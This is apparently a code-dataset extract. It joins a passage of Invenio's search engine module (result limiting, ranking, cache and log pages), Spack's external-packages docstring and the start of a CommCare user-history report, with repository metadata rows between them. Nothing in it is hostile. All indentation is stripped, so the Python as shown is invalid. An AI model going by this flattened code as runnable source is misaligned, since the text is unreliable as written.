search_results_cache.set(query_representation_in_cache + '::cc',
dummy.get('cc', CFG_SITE_NAME),
timeout=CFG_WEBSEARCH_SEARCH_CACHE_TIMEOUT)
if verbose and of.startswith("h"):
write_warning(req, "Search stage 3: storing query results in cache.", req=req)
def prs_apply_search_limits(results_final, kwargs=None, req=None, of=None, cc=None, ln=None, _=None,
p=None, p1=None, p2=None, p3=None, f=None, pl=None, ap=None, dt=None,
ec=None, selected_external_collections_infos=None,
hosted_colls_actual_or_potential_results_p=None,
datetext1=None, datetext2=None, verbose=None, wl=None, em=None,
**dummy):
if datetext1 != "" and results_final != {}:
if verbose and of.startswith("h"):
write_warning("Search stage 5: applying time etc limits, from %s until %s..." % (datetext1, datetext2), req=req)
try:
results_final = intersect_results_with_hitset(req,
results_final,
search_unit_in_bibrec(datetext1, datetext2, dt),
ap,
aptext= _("No match within your time limits, "
"discarding this condition..."),
of=of)
except:
register_exception(req=req, alert_admin=True)
if of.startswith("h"):
req.write(create_error_box(req, verbose=verbose, ln=ln))
perform_external_collection_search_with_em(req, cc, [p, p1, p2, p3], f, ec, verbose,
ln, selected_external_collections_infos, em=em)
return page_end(req, of, ln, em)
if results_final == {} and not hosted_colls_actual_or_potential_results_p:
if of.startswith("h"):
perform_external_collection_search_with_em(req, cc, [p, p1, p2, p3], f, ec, verbose,
ln, selected_external_collections_infos, em=em)
#if of.startswith("x"):
# # Print empty, but valid XML
# print_records_prologue(req, of)
# print_records_epilogue(req, of)
return page_end(req, of, ln, em)
if pl and results_final != {}:
pl = wash_pattern(pl)
if verbose and of.startswith("h"):
write_warning("Search stage 5: applying search pattern limit %s..." % cgi.escape(pl), req=req)
try:
results_final = intersect_results_with_hitset(req,
results_final,
search_pattern_parenthesised(req, pl, ap=0, ln=ln, wl=wl),
ap,
aptext=_("No match within your search limits, "
"discarding this condition..."),
of=of)
except:
register_exception(req=req, alert_admin=True)
if of.startswith("h"):
req.write(create_error_box(req, verbose=verbose, ln=ln))
perform_external_collection_search_with_em(req, cc, [p, p1, p2, p3], f, ec, verbose,
ln, selected_external_collections_infos, em=em)
return page_end(req, of, ln, em)
if results_final == {} and not hosted_colls_actual_or_potential_results_p:
if of.startswith("h"):
perform_external_collection_search_with_em(req, cc, [p, p1, p2, p3], f, ec, verbose,
ln, selected_external_collections_infos, em=em)
if of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
return page_end(req, of, ln, em)
def prs_split_into_collections(kwargs=None, results_final=None, colls_to_search=None, hosted_colls_results=None,
cpu_time=0, results_final_nb_total=None, hosted_colls_actual_or_potential_results_p=None,
hosted_colls_true_results=None, hosted_colls_timeouts=None, **dummy):
results_final_nb_total = 0
results_final_nb = {} # will hold number of records found in each collection
# (in simple dict to display overview more easily)
for coll in results_final.keys():
results_final_nb[coll] = len(results_final[coll])
#results_final_nb_total += results_final_nb[coll]
# Now let us calculate results_final_nb_total more precisely,
# in order to get the total number of "distinct" hits across
# searched collections; this is useful because a record might
# have been attributed to more than one primary collection; so
# we have to avoid counting it multiple times. The price to
# pay for this accuracy of results_final_nb_total is somewhat
# increased CPU time.
if results_final.keys() == 1:
# only one collection; no need to union them
results_final_for_all_selected_colls = results_final.values()[0]
results_final_nb_total = results_final_nb.values()[0]
else:
# okay, some work ahead to union hits across collections:
results_final_for_all_selected_colls = intbitset()
for coll in results_final.keys():
results_final_for_all_selected_colls.union_update(results_final[coll])
results_final_nb_total = len(results_final_for_all_selected_colls)
#if hosted_colls and (of.startswith("h") or of.startswith("x")):
if hosted_colls_actual_or_potential_results_p:
if hosted_colls_results:
for result in hosted_colls_true_results:
colls_to_search.append(result[0][1].name)
results_final_nb[result[0][1].name] = result[1]
results_final_nb_total += result[1]
cpu_time += result[2]
if hosted_colls_timeouts:
for timeout in hosted_colls_timeouts:
colls_to_search.append(timeout[1].name)
# use -963 as a special number to identify the collections that timed out
results_final_nb[timeout[1].name] = -963
kwargs['results_final_nb'] = results_final_nb
kwargs['results_final_nb_total'] = results_final_nb_total
kwargs['results_final_for_all_selected_colls'] = results_final_for_all_selected_colls
kwargs['cpu_time'] = cpu_time #rca TODO: check where the cpu_time is used, this line was missing
return (results_final_nb, results_final_nb_total, results_final_for_all_selected_colls)
def prs_summarize_records(kwargs=None, req=None, p=None, f=None, aas=None,
p1=None, p2=None, p3=None, f1=None, f2=None, f3=None, op1=None, op2=None,
ln=None, results_final_for_all_selected_colls=None, of='hcs', **dummy):
# feed the current search to be summarized:
from invenio.search_engine_summarizer import summarize_records
search_p = p
search_f = f
if not p and (aas == 1 or p1 or p2 or p3):
op_d = {'n': ' and not ', 'a': ' and ', 'o': ' or ', '': ''}
triples = ziplist([f1, f2, f3], [p1, p2, p3], [op1, op2, ''])
triples_len = len(triples)
for i in range(triples_len):
fi, pi, oi = triples[i] # e.g.:
if i < triples_len-1 and not triples[i+1][1]: # if p2 empty
triples[i+1][0] = '' # f2 must be too
oi = '' # and o1
if ' ' in pi:
pi = '"'+pi+'"'
if fi:
fi = fi + ':'
search_p += fi + pi + op_d[oi]
search_f = ''
summarize_records(results_final_for_all_selected_colls, of, ln, search_p, search_f, req)
def prs_print_records(kwargs=None, results_final=None, req=None, of=None, cc=None, pl_in_url=None,
ln=None, _=None, p=None, p1=None, p2=None, p3=None, f=None, rg=None, sf=None,
so=None, sp=None, rm=None, ot=None, aas=None, f1=None, m1=None, op1=None,
f2=None, m2=None, op2=None, f3=None, m3=None, sc=None, d1y=None, d1m=None,
d1d=None, d2y=None, d2m=None, d2d=None, dt=None, jrec=None, colls_to_search=None,
hosted_colls_actual_or_potential_results_p=None, hosted_colls_results=None,
hosted_colls_true_results=None, hosted_colls_timeouts=None, results_final_nb=None,
cpu_time=None, verbose=None, em=None, **dummy):
if len(colls_to_search)>1:
cpu_time = -1 # we do not want to have search time printed on each collection
print_records_prologue(req, of, cc=cc)
results_final_colls = []
wlqh_results_overlimit = 0
for coll in colls_to_search:
if results_final.has_key(coll) and len(results_final[coll]):
if of.startswith("h"):
req.write(print_search_info(p, f, sf, so, sp, rm, of, ot, coll, results_final_nb[coll],
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time, em=em))
results_final_recIDs = list(results_final[coll])
results_final_relevances = []
results_final_relevances_prologue = ""
results_final_relevances_epilogue = ""
if rm: # do we have to rank?
results_final_recIDs_ranked, results_final_relevances, results_final_relevances_prologue, results_final_relevances_epilogue, results_final_comments = \
rank_records(req, rm, 0, results_final[coll],
string.split(p) + string.split(p1) +
string.split(p2) + string.split(p3), verbose, so, of, ln, rg, jrec, kwargs['f'])
if of.startswith("h"):
write_warning(results_final_comments, req=req)
if results_final_recIDs_ranked:
results_final_recIDs = results_final_recIDs_ranked
else:
# rank_records failed and returned some error message to display:
write_warning(results_final_relevances_prologue, req=req)
write_warning(results_final_relevances_epilogue, req=req)
elif sf or (CFG_BIBSORT_BUCKETS and sorting_methods): # do we have to sort?
results_final_recIDs = sort_records(req, results_final_recIDs, sf, so, sp, verbose, of, ln, rg, jrec)
if len(results_final_recIDs) < CFG_WEBSEARCH_PREV_NEXT_HIT_LIMIT:
results_final_colls.append(results_final_recIDs)
else:
wlqh_results_overlimit = 1
print_records(req, results_final_recIDs, jrec, rg, of, ot, ln,
results_final_relevances,
results_final_relevances_prologue,
results_final_relevances_epilogue,
search_pattern=p,
print_records_prologue_p=False,
print_records_epilogue_p=False,
verbose=verbose,
sf=sf,
so=so,
sp=sp,
rm=rm,
em=em)
if of.startswith("h"):
req.write(print_search_info(p, f, sf, so, sp, rm, of, ot, coll, results_final_nb[coll],
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time, 1, em=em))
if req and not isinstance(req, cStringIO.OutputType):
# store the last search results page
session_param_set(req, 'websearch-last-query', req.unparsed_uri)
if wlqh_results_overlimit:
results_final_colls = None
# store list of results if user wants to display hits
# in a single list, or store list of collections of records
# if user displays hits split by collections:
session_param_set(req, 'websearch-last-query-hits', results_final_colls)
#if hosted_colls and (of.startswith("h") or of.startswith("x")):
if hosted_colls_actual_or_potential_results_p:
if hosted_colls_results:
# TODO: add a verbose message here
for result in hosted_colls_true_results:
if of.startswith("h"):
req.write(print_hosted_search_info(p, f, sf, so, sp, rm, of, ot, result[0][1].name, results_final_nb[result[0][1].name],
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time, em=em))
req.write(print_hosted_results(url_and_engine=result[0], ln=ln, of=of, req=req, limit=rg, em=em))
if of.startswith("h"):
req.write(print_hosted_search_info(p, f, sf, so, sp, rm, of, ot, result[0][1].name, results_final_nb[result[0][1].name],
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time, 1))
if hosted_colls_timeouts:
# TODO: add a verbose message here
# TODO: check if verbose messages still work when dealing with (re)calculations of timeouts
(hosted_colls_timeouts_results, hosted_colls_timeouts_timeouts) = do_calculate_hosted_collections_results(req, ln, None, verbose, None, hosted_colls_timeouts, CFG_HOSTED_COLLECTION_TIMEOUT_POST_SEARCH)
if hosted_colls_timeouts_results:
for result in hosted_colls_timeouts_results:
if result[1] == None or result[1] == False:
## these are the searches the returned no or zero results
## also print a nearest terms box, in case this is the only
## collection being searched and it returns no results?
if of.startswith("h"):
req.write(print_hosted_search_info(p, f, sf, so, sp, rm, of, ot, result[0][1].name, -963,
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time))
req.write(print_hosted_results(url_and_engine=result[0], ln=ln, of=of, req=req, no_records_found=True, limit=rg, em=em))
req.write(print_hosted_search_info(p, f, sf, so, sp, rm, of, ot, result[0][1].name, -963,
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time, 1))
else:
# these are the searches that actually returned results on time
if of.startswith("h"):
req.write(print_hosted_search_info(p, f, sf, so, sp, rm, of, ot, result[0][1].name, result[1],
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time))
req.write(print_hosted_results(url_and_engine=result[0], ln=ln, of=of, req=req, limit=rg, em=em))
if of.startswith("h"):
req.write(print_hosted_search_info(p, f, sf, so, sp, rm, of, ot, result[0][1].name, result[1],
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time, 1))
if hosted_colls_timeouts_timeouts:
for timeout in hosted_colls_timeouts_timeouts:
if of.startswith("h"):
req.write(print_hosted_search_info(p, f, sf, so, sp, rm, of, ot, timeout[1].name, -963,
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time))
req.write(print_hosted_results(url_and_engine=timeout[0], ln=ln, of=of, req=req, search_timed_out=True, limit=rg, em=em))
req.write(print_hosted_search_info(p, f, sf, so, sp, rm, of, ot, timeout[1].name, -963,
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time, 1))
print_records_epilogue(req, of)
if f == "author" and of.startswith("h"):
req.write(create_similarly_named_authors_link_box(p, ln))
def prs_log_query(kwargs=None, req=None, uid=None, of=None, ln=None, p=None, f=None,
colls_to_search=None, results_final_nb_total=None, em=None, **dummy):
# FIXME move query logging to signal receiver
# log query:
try:
from flask.ext.login import current_user
if req:
from flask import request
req = request
id_query = log_query(req.host,
'&'.join(map(lambda (k,v): k+'='+v, request.values.iteritems(multi=True))),
uid)
#id_query = log_query(req.remote_host, req.args, uid)
#of = request.values.get('of', 'hb')
if of.startswith("h") and id_query and (em == '' or EM_REPOSITORY["alert"] in em):
if not of in ['hcs', 'hcs2']:
# display alert/RSS teaser for non-summary formats:
display_email_alert_part = True
if current_user:
if current_user['email'] == 'guest':
if CFG_ACCESS_CONTROL_LEVEL_ACCOUNTS > 4:
display_email_alert_part = False
else:
if not current_user['precached_usealerts']:
display_email_alert_part = False
from flask import flash
flash(websearch_templates.tmpl_alert_rss_teaser_box_for_query(id_query, \
ln=ln, display_email_alert_part=display_email_alert_part), 'search-results-after')
except:
# do not log query if req is None (used by CLI interface)
pass
log_query_info("ss", p, f, colls_to_search, results_final_nb_total)
def prs_search_common(kwargs=None, req=None, of=None, cc=None, ln=None, uid=None, _=None, p=None,
p1=None, p2=None, p3=None, colls_to_display=None, f=None, rg=None, sf=None,
so=None, sp=None, rm=None, ot=None, aas=None, f1=None, m1=None, op1=None,
f2=None, m2=None, op2=None, f3=None, m3=None, sc=None, pl=None,
d1y=None, d1m=None, d1d=None, d2y=None, d2m=None, d2d=None,
dt=None, jrec=None, ec=None, action=None, colls_to_search=None, wash_colls_debug=None,
verbose=None, wl=None, em=None, **dummy):
query_representation_in_cache = get_search_results_cache_key(**kwargs)
page_start(req, of, cc, aas, ln, uid, p=create_page_title_search_pattern_info(p, p1, p2, p3), em=em)
if of.startswith("h") and verbose and wash_colls_debug:
write_warning("wash_colls debugging info : %s" % wash_colls_debug, req=req)
prs_search_hosted_collections(kwargs=kwargs, **kwargs)
if of.startswith("h"):
req.write(create_search_box(cc, colls_to_display, p, f, rg, sf, so, sp, rm, of, ot, aas, ln, p1, f1, m1, op1,
p2, f2, m2, op2, p3, f3, m3, sc, pl, d1y, d1m, d1d, d2y, d2m, d2d, dt, jrec, ec, action,
em
))
t1 = os.times()[4]
results_in_any_collection = intbitset()
if aas == 1 or (p1 or p2 or p3):
## 3A - advanced search
output = prs_advanced_search(results_in_any_collection, kwargs=kwargs, **kwargs)
if output is not None:
return output
else:
## 3B - simple search
output = prs_simple_search(results_in_any_collection, kwargs=kwargs, **kwargs)
if output is not None:
return output
if len(results_in_any_collection) == 0 and not kwargs['hosted_colls_actual_or_potential_results_p']:
if of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
return None
# store this search query results into search results cache if needed:
prs_store_results_in_cache(query_representation_in_cache, results_in_any_collection, **kwargs)
# search stage 4 and 5: intersection with collection universe and sorting/limiting
try:
output = prs_intersect_with_colls_and_apply_search_limits(results_in_any_collection, kwargs=kwargs, **kwargs)
if output is not None:
return output
except Exception: # no results to display
return None
t2 = os.times()[4]
cpu_time = t2 - t1
kwargs['cpu_time'] = cpu_time
## search stage 6: display results:
return prs_display_results(kwargs=kwargs, **kwargs)
def prs_intersect_with_colls_and_apply_search_limits(results_in_any_collection,
kwargs=None, req=None, of=None, ln=None, _=None,
p=None, p1=None, p2=None, p3=None, f=None, cc=None, ec=None,
verbose=None, em=None, **dummy):
# search stage 4: intersection with collection universe:
results_final = {}
output = prs_intersect_results_with_collrecs(results_final, results_in_any_collection, kwargs, **kwargs)
if output is not None:
return output
# another external search if we still don't have something
if results_final == {} and not kwargs['hosted_colls_actual_or_potential_results_p']:
if of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
kwargs['results_final'] = results_final
raise Exception
# search stage 5: apply search option limits and restrictions:
output = prs_apply_search_limits(results_final, kwargs=kwargs, **kwargs)
kwargs['results_final'] = results_final
if output is not None:
return output
def prs_display_results(kwargs=None, results_final=None, req=None, of=None, sf=None,
so=None, sp=None, verbose=None, p=None, p1=None, p2=None, p3=None,
cc=None, ln=None, _=None, ec=None, colls_to_search=None, rm=None, cpu_time=None,
f=None, em=None, **dummy
):
## search stage 6: display results:
# split result set into collections
(results_final_nb, results_final_nb_total, results_final_for_all_selected_colls) = prs_split_into_collections(kwargs=kwargs, **kwargs)
# we continue past this point only if there is a hosted collection that has timed out and might offer potential results
if results_final_nb_total == 0 and not kwargs['hosted_colls_potential_results_p']:
if of.startswith("h"):
write_warning("No match found, please enter different search terms.", req=req)
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
else:
prs_log_query(kwargs=kwargs, **kwargs)
# yes, some hits found: good!
# collection list may have changed due to not-exact-match-found policy so check it out:
for coll in results_final.keys():
if coll not in colls_to_search:
colls_to_search.append(coll)
# print results overview:
if of == "intbitset":
#return the result as an intbitset
return results_final_for_all_selected_colls
elif of == "id":
# we have been asked to return list of recIDs
recIDs = list(results_final_for_all_selected_colls)
if rm: # do we have to rank?
results_final_for_all_colls_rank_records_output = rank_records(req, rm, 0, results_final_for_all_selected_colls,
string.split(p) + string.split(p1) +
string.split(p2) + string.split(p3), verbose, so, of, ln, kwargs['rg'], kwargs['jrec'], kwargs['f'])
if results_final_for_all_colls_rank_records_output[0]:
recIDs = results_final_for_all_colls_rank_records_output[0]
elif sf or (CFG_BIBSORT_BUCKETS and sorting_methods): # do we have to sort?
recIDs = sort_records(req, recIDs, sf, so, sp, verbose, of, ln)
return recIDs
elif of.startswith("h"):
if of not in ['hcs', 'hcs2']:
# added the hosted_colls_potential_results_p parameter to help print out the overview more accurately
req.write(print_results_overview(colls_to_search, results_final_nb_total, results_final_nb, cpu_time,
ln, ec, hosted_colls_potential_results_p=kwargs['hosted_colls_potential_results_p'], em=em))
kwargs['selected_external_collections_infos'] = print_external_results_overview(req, cc, [p, p1, p2, p3],
f, ec, verbose, ln, print_overview=em == "" or EM_REPOSITORY["overview"] in em)
# print number of hits found for XML outputs:
if of.startswith("x") or of == 'mobb':
req.write("<!-- Search-Engine-Total-Number-Of-Results: %s -->\n" % kwargs['results_final_nb_total'])
# print records:
if of in ['hcs', 'hcs2']:
prs_summarize_records(kwargs=kwargs, **kwargs)
else:
prs_print_records(kwargs=kwargs, **kwargs)
# this is a copy of the prs_display_results with output parts removed, needed for external modules
def prs_rank_results(kwargs=None, results_final=None, req=None, colls_to_search=None,
sf=None, so=None, sp=None, of=None, rm=None, p=None, p1=None, p2=None, p3=None,
verbose=None, **dummy
):
## search stage 6: display results:
# split result set into collections
(results_final_nb, results_final_nb_total, results_final_for_all_selected_colls) = prs_split_into_collections(kwargs=kwargs, **kwargs)
# yes, some hits found: good!
# collection list may have changed due to not-exact-match-found policy so check it out:
for coll in results_final.keys():
if coll not in colls_to_search:
colls_to_search.append(coll)
# we have been asked to return list of recIDs
recIDs = list(results_final_for_all_selected_colls)
if rm: # do we have to rank?
results_final_for_all_colls_rank_records_output = rank_records(req, rm, 0, results_final_for_all_selected_colls,
string.split(p) + string.split(p1) +
string.split(p2) + string.split(p3), verbose, so, of, field=kwargs['f'])
if results_final_for_all_colls_rank_records_output[0]:
recIDs = results_final_for_all_colls_rank_records_output[0]
elif sf or (CFG_BIBSORT_BUCKETS and sorting_methods): # do we have to sort?
recIDs = sort_records(req, recIDs, sf, so, sp, verbose, of)
return recIDs
def perform_request_cache(req, action="show"):
"""Manipulates the search engine cache."""
req.content_type = "text/html"
req.send_http_header()
req.write("<html>")
out = ""
out += "<h1>Search Cache</h1>"
req.write(out)
# show collection reclist cache:
out = "<h3>Collection reclist cache</h3>"
out += "- collection table last updated: %s" % get_table_update_time('collection')
out += "<br />- reclist cache timestamp: %s" % collection_reclist_cache.timestamp
out += "<br />- reclist cache contents:"
out += "<blockquote>"
for coll in collection_reclist_cache.cache.keys():
if collection_reclist_cache.cache[coll]:
out += "%s (%d)<br />" % (coll, len(collection_reclist_cache.cache[coll]))
out += "</blockquote>"
req.write(out)
# show field i18nname cache:
out = "<h3>Field I18N names cache</h3>"
out += "- fieldname table last updated: %s" % get_table_update_time('fieldname')
out += "<br />- i18nname cache timestamp: %s" % field_i18nname_cache.timestamp
out += "<br />- i18nname cache contents:"
out += "<blockquote>"
for field in field_i18nname_cache.cache.keys():
for ln in field_i18nname_cache.cache[field].keys():
out += "%s, %s = %s<br />" % (field, ln, field_i18nname_cache.cache[field][ln])
out += "</blockquote>"
req.write(out)
# show collection i18nname cache:
out = "<h3>Collection I18N names cache</h3>"
out += "- collectionname table last updated: %s" % get_table_update_time('collectionname')
out += "<br />- i18nname cache timestamp: %s" % collection_i18nname_cache.timestamp
out += "<br />- i18nname cache contents:"
out += "<blockquote>"
for coll in collection_i18nname_cache.cache.keys():
for ln in collection_i18nname_cache.cache[coll].keys():
out += "%s, %s = %s<br />" % (coll, ln, collection_i18nname_cache.cache[coll][ln])
out += "</blockquote>"
req.write(out)
req.write("</html>")
return "\n"
def perform_request_log(req, date=""):
"""Display search log information for given date."""
req.content_type = "text/html"
req.send_http_header()
req.write("<html>")
req.write("<h1>Search Log</h1>")
if date: # case A: display stats for a day
yyyymmdd = string.atoi(date)
req.write("<p><big><strong>Date: %d</strong></big><p>" % yyyymmdd)
req.write("""<table border="1">""")
req.write("<tr><td><strong>%s</strong></td><td><strong>%s</strong></td><td><strong>%s</strong></td><td><strong>%s</strong></td><td><strong>%s</strong></td><td><strong>%s</strong></td></tr>" % ("No.", "Time", "Pattern", "Field", "Collection", "Number of Hits"))
# read file:
p = os.popen("grep ^%d %s/search.log" % (yyyymmdd, CFG_LOGDIR), 'r')
lines = p.readlines()
p.close()
# process lines:
i = 0
for line in lines:
try:
datetime, dummy_aas, p, f, c, nbhits = string.split(line,"#")
i += 1
req.write("<tr><td align=\"right\">#%d</td><td>%s:%s:%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td></tr>" \
% (i, datetime[8:10], datetime[10:12], datetime[12:], p, f, c, nbhits))
except:
pass # ignore eventual wrong log lines
req.write("</table>")
else: # case B: display summary stats per day
yyyymm01 = int(time.strftime("%Y%m01", time.localtime()))
yyyymmdd = int(time.strftime("%Y%m%d", time.localtime()))
req.write("""<table border="1">""")
req.write("<tr><td><strong>%s</strong></td><td><strong>%s</strong></tr>" % ("Day", "Number of Queries"))
for day in range(yyyymm01, yyyymmdd + 1):
p = os.popen("grep -c ^%d %s/search.log" % (day, CFG_LOGDIR), 'r')
for line in p.readlines():
req.write("""<tr><td>%s</td><td align="right"><a href="%s/search/log?date=%d">%s</a></td></tr>""" % \
(day, CFG_SITE_URL, day, line))
p.close()
req.write("</table>")
req.write("</html>")
return "\n"
def get_all_field_values(tag):
"""
Return all existing values stored for a given tag.
@param tag: the full tag, e.g. 909C0b
@type tag: string
@return: the list of values
@rtype: list of strings
"""
table = 'bib%02dx' % int(tag[:2])
return [row[0] for row in run_sql("SELECT DISTINCT(value) FROM %s WHERE tag=%%s" % table, (tag, ))]
def get_most_popular_field_values(recids, tags, exclude_values=None, count_repetitive_values=True, split_by=0):
"""
Analyze RECIDS and look for TAGS and return most popular values
and the frequency with which they occur sorted according to
descending frequency.
If a value is found in EXCLUDE_VALUES, then do not count it.
If COUNT_REPETITIVE_VALUES is True, then we count every occurrence
of value in the tags. If False, then we count the value only once
regardless of the number of times it may appear in a record.
(But, if the same value occurs in another record, we count it, of
course.)
@return: list of tuples containing tag and its frequency
Example:
>>> get_most_popular_field_values(range(11,20), '980__a')
[('PREPRINT', 10), ('THESIS', 7), ...]
>>> get_most_popular_field_values(range(11,20), ('100__a', '700__a'))
[('Ellis, J', 10), ('Ellis, N', 7), ...]
>>> get_most_popular_field_values(range(11,20), ('100__a', '700__a'), ('Ellis, J'))
[('Ellis, N', 7), ...]
"""
def _get_most_popular_field_values_helper_sorter(val1, val2):
"""Compare VAL1 and VAL2 according to, firstly, frequency, then
secondly, alphabetically."""
compared_via_frequencies = cmp(valuefreqdict[val2],
valuefreqdict[val1])
if compared_via_frequencies == 0:
return cmp(val1.lower(), val2.lower())
else:
return compared_via_frequencies
valuefreqdict = {}
## sanity check:
if not exclude_values:
exclude_values = []
if isinstance(tags, str):
tags = (tags,)
## find values to count:
vals_to_count = []
displaytmp = {}
if count_repetitive_values:
# counting technique A: can look up many records at once: (very fast)
for tag in tags:
vals_to_count.extend(get_fieldvalues(recids, tag, sort=False,
split_by=split_by))
else:
# counting technique B: must count record-by-record: (slow)
for recid in recids:
vals_in_rec = []
for tag in tags:
for val in get_fieldvalues(recid, tag, False):
vals_in_rec.append(val)
# do not count repetitive values within this record
# (even across various tags, so need to unify again):
dtmp = {}
for val in vals_in_rec:
dtmp[val.lower()] = 1
displaytmp[val.lower()] = val
vals_in_rec = dtmp.keys()
vals_to_count.extend(vals_in_rec)
## are we to exclude some of found values?
for val in vals_to_count:
if val not in exclude_values:
if val in valuefreqdict:
valuefreqdict[val] += 1
else:
valuefreqdict[val] = 1
## sort by descending frequency of values:
if not CFG_NUMPY_IMPORTABLE:
## original version
out = []
vals = valuefreqdict.keys()
vals.sort(_get_most_popular_field_values_helper_sorter)
for val in vals:
tmpdisplv = ''
if val in displaytmp:
tmpdisplv = displaytmp[val]
else:
tmpdisplv = val
out.append((tmpdisplv, valuefreqdict[val]))
return out
else:
f = [] # frequencies
n = [] # original names
ln = [] # lowercased names
## build lists within one iteration
for (val, freq) in valuefreqdict.iteritems():
f.append(-1 * freq)
if val in displaytmp:
n.append(displaytmp[val])
else:
n.append(val)
ln.append(val.lower())
## sort by frequency (desc) and then by lowercased name.
return [(n[i], -1 * f[i]) for i in numpy.lexsort([ln, f])]
def profile(p="", f="", c=CFG_SITE_NAME):
"""Profile search time."""
import profile
import pstats
profile.run("perform_request_search(p='%s',f='%s', c='%s')" % (p, f, c), "perform_request_search_profile")
p = pstats.Stats("perform_request_search_profile")
p.strip_dirs().sort_stats("cumulative").print_stats()
return 0
def perform_external_collection_search_with_em(req, current_collection, pattern_list, field,
external_collection, verbosity_level=0, lang=CFG_SITE_LANG,
selected_external_collections_infos=None, em=""):
perform_external_collection_search(req, current_collection, pattern_list, field, external_collection,
verbosity_level, lang, selected_external_collections_infos,
print_overview=em == "" or EM_REPOSITORY["overview"] in em,
print_search_info=em == "" or EM_REPOSITORY["search_info"] in em,
print_see_also_box=em == "" or EM_REPOSITORY["see_also_box"] in em,
print_body=em == "" or EM_REPOSITORY["body"] in em)
|
EUDAT-B2SHARE/invenio-old
|
modules/websearch/lib/search_engine.py
|
Python
|
gpl-2.0
| 314,285
| 0.007118
|
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
"""
This module contains external, potentially separately licensed,
packages that are included in spack.
So far:
argparse: We include our own version to be Python 2.6 compatible.
distro: Provides a more stable linux distribution detection.
functools: Used for implementation of total_ordering.
jinja2: A modern and designer-friendly templating language for Python
jsonschema: An implementation of JSON Schema for Python.
ordereddict: We include our own version to be Python 2.6 compatible.
py: Needed by pytest. Library with cross-python path,
ini-parsing, io, code, and log facilities.
pyqver2: External script to query required python version of
python source code. Used for ensuring 2.6 compatibility.
pytest: Testing framework used by Spack.
yaml: Used for config files.
"""
|
TheTimmy/spack
|
lib/spack/external/__init__.py
|
Python
|
lgpl-2.1
| 2,139
| 0
|
from django.core.exceptions import ObjectDoesNotExist
from django.db.models import Q
from django.template.loader import render_to_string
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_lazy
from memoized import memoized
from corehq import privileges
from corehq.apps.accounting.models import BillingAccount
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.reports.datatables import DataTablesColumn, DataTablesHeader
from corehq.apps.reports.dispatcher import UserManagementReportDispatcher
from corehq.apps.reports.filters.users import (
ChangeActionFilter,
ChangedByUserFilter,
EnterpriseUserFilter,
)
from corehq.apps.reports.filters.users import \
ExpandedMobileWorkerFilter as EMWF
from corehq.apps.reports.generic import GenericTabularReport, GetParamsMixin, PaginatedReportMixin
from corehq.apps.reports.standard import DatespanMixin, ProjectReport
from corehq.apps.users.audit.change_messages import (
ASSIGNED_LOCATIONS_FIELD,
CHANGE_MESSAGES_FIELDS,
DOMAIN_FIELD,
LOCATION_FIELD,
PHONE_NUMBERS_FIELD,
ROLE_FIELD,
TWO_FACTOR_FIELD,
get_messages,
)
from corehq.apps.users.models import UserHistory
from corehq.const import USER_DATETIME_FORMAT
from corehq.util.timezones.conversions import ServerTime
class UserHistoryReport(GetParamsMixin, DatespanMixin, GenericTabularReport, ProjectReport, PaginatedReportMixin):
slug = 'user_history'
name = ugettext_lazy("User History")
section_name = ugettext_lazy("User Management")
dispatcher = UserManagementReportDispatcher
fields = [
'corehq.apps.reports.filters.users.AffectedUserFilter',
'corehq.apps.reports.filters.users.ChangedByUserFilter',
'corehq.apps.reports.filters.dates.DatespanFilter',
'corehq.apps.reports.filters.users.ChangeActionFilter',
